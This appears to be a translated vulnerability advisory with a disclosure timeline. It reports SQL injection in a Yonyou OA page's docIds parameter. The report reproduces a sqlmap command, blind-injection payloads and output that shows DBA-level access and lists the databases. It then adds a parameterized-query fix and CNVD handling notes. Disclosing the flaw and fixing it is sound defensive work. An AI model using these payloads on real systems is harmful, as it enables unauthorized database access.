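2015-12-24: Details reported to the vendor; awaiting vendor handling
2015-12-28: Vendor confirmed; details disclosed to the vendor only
2016-01-07: Details disclosed to core white hats and experts in related fields
2016-01-17: Details disclosed to regular white hats
2016-01-27: Details disclosed to intern white hats
2016-02-09: Details disclosed to the public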
SQL injection vulnerability
Injection point (Yonyou OA system): http://**.**.**.**:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1
python sqlmap.py -u http://**.**.**.**:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 --thread 10 --dbms mysql --current-user --current-db --is-dba

Parameter: docIds (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: docIds=1 RLIKE (SELECT (CASE WHEN (8219=8219) THEN 1 ELSE 0x28 END))

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
    Payload: docIds=1,(SELECT (CASE WHEN (7121=7121) THEN (SELECT BENCHMARK(5000000,MD5(0x52634942))) ELSE 7121*(SELECT 7121 FROM mysql.db) END))
---
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhost'
current database: 'mysql3235'
current user is DBA: True

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: docIds (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: docIds=1 RLIKE (SELECT (CASE WHEN (8219=8219) THEN 1 ELSE 0x28 END))

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
    Payload: docIds=1,(SELECT (CASE WHEN (7121=7121) THEN (SELECT BENCHMARK(5000000,MD5(0x52634942))) ELSE 7121*(SELECT 7121 FROM mysql.db) END))
---
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhost'
current database: 'mysql3235'
current user is DBA: True
available databases [4]:
[*] information_schema
[*] mysql
[*] mysql3235
[*] temp
Filter input and upgrade the system. Please fix this promptly.
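One way to apply the "filter" fix to a parameter like docIds, as an added example that is not the reporter's or the vendor's code. It assumes docIds is a comma-separated list of numeric ids used in an IN clause, and uses Python with an in-memory SQLite table (urge_info and its columns are hypothetical names); the same allow-list-then-bind pattern applies to a JDBC PreparedStatement in the JSP.

```python
import re
import sqlite3

MAX_IDS = 100                         # assumed cap on ids per request
ID_RE = re.compile(r"[0-9]{1,9}")     # ASCII digits only, bounded length

def parse_doc_ids(raw):
    """Allow-list check: return docIds as ints or raise ValueError."""
    parts = (raw or "").split(",")
    if len(parts) > MAX_IDS:
        raise ValueError("too many ids in docIds")
    if not all(ID_RE.fullmatch(p) for p in parts):
        raise ValueError("docIds must be comma-separated integers")
    return [int(p) for p in parts]

def load_urge_info(conn, raw_doc_ids):
    """Look up rows with every id passed as a bound parameter."""
    ids = parse_doc_ids(raw_doc_ids)
    marks = ",".join(["?"] * len(ids))   # only "?" is ever formatted into the SQL
    sql = f"SELECT doc_id, title FROM urge_info WHERE doc_id IN ({marks}) ORDER BY doc_id"
    return conn.execute(sql, ids).fetchall()

def make_demo_db():
    """Constructed sample data; table and column names are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE urge_info (doc_id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO urge_info VALUES (?, ?)",
                     [(1, "budget"), (2, "audit"), (3, "contract")])
    return conn

def demo():
    """Run valid and invalid docIds values; map each to rows or 'rejected'."""
    conn = make_demo_db()
    samples = [
        "1",
        "1,3",
        "",  # empty parameter
        "1 RLIKE (SELECT (CASE WHEN (8219=8219) THEN 1 ELSE 0x28 END))",  # value from the report
        "1,(SELECT 1)",  # constructed non-numeric list element
    ]
    out = {}
    for raw in samples:
        try:
            out[raw] = load_urge_info(conn, raw)
        except ValueError:
            out[raw] = "rejected"
    return out

if __name__ == "__main__":
    for raw, result in demo().items():
        print(repr(raw), "->", result)
```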
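Severity: High
Vulnerability Rank: 10
Confirmed: 2015-12-28 17:50
CNVD confirmed and reproduced the reported issue. It has been passed to CNCERT, which forwarded it to the Shandong branch center; the branch will coordinate follow-up handling with the organization that manages the website.
None yet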